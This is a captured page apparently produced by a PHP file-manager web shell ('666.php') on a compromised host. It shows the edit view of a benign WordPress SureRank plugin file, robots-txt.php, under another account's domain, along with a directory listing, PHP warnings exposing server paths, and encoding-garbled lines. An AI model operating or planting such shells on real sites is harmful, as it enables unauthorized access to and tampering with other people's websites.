??????????????
??????????????
??????????????
??????????????
Warning : Undefined variable $auth in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
Warning : Trying to access array offset on value of type null in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
??????????????
??????????????
??????????????
??????????????
File Manager
✏️ Edit File: /home/mklsvubc/sendmaxagency.com/wp-content/plugins/surerank/inc/api/robots-txt.php
⬅ Kembali
<?php
/**
* RobotsTxt class
*
* Handles installed products related REST API endpoints for the SureRank plugin.
*
* @package SureRank\Inc\API
*/
namespace SureRank\Inc\API;
use SureRank\Inc\Functions\Send_Json;
use SureRank\Inc\Traits\Get_Instance;
use WP_REST_Server;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Class RobotsTxt
*
* Handles robots.txt related REST API endpoints.
*/
class RobotsTxt extends Api_Base {
use Get_Instance;
/**
* Route Get Robots.txt
*/
protected const ROBOTS_TXT = '/robots-txt';
/**
* Register API routes.
*
* @since 1.2.0
* @return void
*/
public function register_routes() {
register_rest_route(
$this->get_api_namespace(),
self::ROBOTS_TXT,
[
'methods' => WP_REST_Server::CREATABLE, // POST method.
'callback' => [ $this, 'update_robots_txt' ],
'permission_callback' => [ $this, 'validate_permission' ],
'args' => [
'robots_txt_content' => [
'required' => true,
'type' => 'string',
],
],
'role_capability' => 'global_setting',
]
);
}
/**
* Update the robots.txt content.
*
* @param \WP_REST_Request<array<string, mixed>> $request Request object.
* @return void
*/
public function update_robots_txt( $request ) {
$robots_content = $request->get_param( 'robots_txt_content' );
$robots_content = sanitize_textarea_field( $robots_content );
update_option( SURERANK_ROBOTS_TXT_CONTENT, $robots_content );
Send_Json::success(
[
'success' => true,
'data' => [
'robots_txt_content' => $robots_content,
],
]
);
}
}
Nama
Tipe
Ukuran
Diubah
Aksi
🐘 admin.php
php
17.6 KB
2026-06-18 16:45
🐘 analyzer.php
php
81.8 KB
2026-06-18 16:45
🐘 api-base.php
php
5.4 KB
2026-06-18 16:45
🐘 api-init.php
php
1.3 KB
2026-06-18 16:45
🐘 headless-sitemap.php
php
7.9 KB
2026-06-18 16:45
🐘 headless.php
php
23.5 KB
2026-06-18 16:45
🐘 import-export-settings.php
php
5.9 KB
2026-06-18 16:45
🐘 install-products.php
php
2.5 KB
2026-06-18 16:45
🐘 learn.php
php
7.6 KB
2026-06-18 16:45
🐘 migrations.php
php
41 KB
2026-06-18 16:45
🐘 onboarding.php
php
22.9 KB
2026-06-18 16:45
🐘 post.php
php
15.8 KB
2026-06-18 16:45
🐘 rest-fields.php
php
7.4 KB
2026-06-18 16:45
🐘 robots-txt.php
php
1.6 KB
2026-06-18 16:45
🐘 sitemap.php
php
7 KB
2026-06-18 16:45
🐘 stock-images.php
php
4.8 KB
2026-06-18 16:45
🐘 term.php
php
8.9 KB
2026-06-18 16:45
🐘 user-seo.php
php
9.6 KB
2026-06-18 16:45
🐘 utils.php
php
5.3 KB
2026-06-18 16:45